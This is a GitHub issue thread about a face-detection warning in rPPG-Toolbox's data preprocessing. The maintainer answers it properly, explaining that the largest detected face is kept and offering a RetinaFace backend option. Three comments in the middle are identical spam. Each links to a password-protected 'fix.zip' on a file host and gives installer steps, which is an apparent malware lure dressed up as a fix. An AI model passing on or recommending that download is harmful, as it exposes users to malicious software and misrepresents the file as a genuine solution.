### ISSUE TITLE
Data preprocessing problem

### ISSUE THREAD

**Issue by CosionMa** [ubicomplab/rPPG-Toolbox#306]
I arranged the two data sets PURE and UBFC-rPPG according to the readme.txt file you published, and configured the configuration files used according to the steps given in 'Training on PURE and Testing on UBFC-rPPG With TSCAN'. Finally, I run the 'python main.py --config_file./configs/train_configs/PURE_PURE_UBFC-rPPG_TSCAN_BASIC.yaml' command. However, there is a phenomenon that always shows that there is a problem with preprocessed data, although it does not affect the overall code running process. I would like to ask you why this data preprocessing always appears warning. Please see the attached picture below for the specific operation.
![f1757454d6b1bfef0a6bf9662cfb6bd](https://github.com/user-attachments/assets/e4d2a9ce-1300-495e-bbba-7a0dafb52f86)
![5ee2791da9adcd219ef2a22c33a6c4a](https://github.com/user-attachments/assets/959b9f00-ace1-4572-94dd-63303996b67f)

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yahskapar** [comment]
Hi @CosionMa,

Not sure what those weird, almost instant spam replies were, but those should be deleted now.

Regarding your observation of the warning in the terminal output, this has to do with [our approach to face detection](https://github.com/ubicomplab/rPPG-Toolbox/blob/main/dataset/data_loader/BaseLoader.py#L267-L344) and how the detection of multiple faces is resolved to result in only a single, cropped face. With the datasets supported by this toolbox, such as UBFC-rPPG and PURE, this really is a matter of the real face being detected and some kind of false positive (e.g., a portion of clothing in the video or a weird background lighting effect) also being detected. We simply pick the largest detected face, which practically speaking will be the actual face in the video, but opt to show that warning message as well for reference. 

It's possible (albeit not observed yet with any of the currently supported datasets) that the largest detected face in a scenario where multiple faces are detected actually ends up not being a face at all. If you're using the default face detection backend of Haar Cascade, you can try setting `*.DATA.PREPROCESS.CROP_FACE.BACKEND` to `RF` to utilize RetinaFace as a backend instead. This may prevent the appearance of that particular warning.

**Comment by yahskapar** [comment]
Given the answer in my previous reply, I"ll go ahead and close this issue - feel free to make a comment on / re-open this one if you need any additional clarification, or make a new one if you have other concerns.
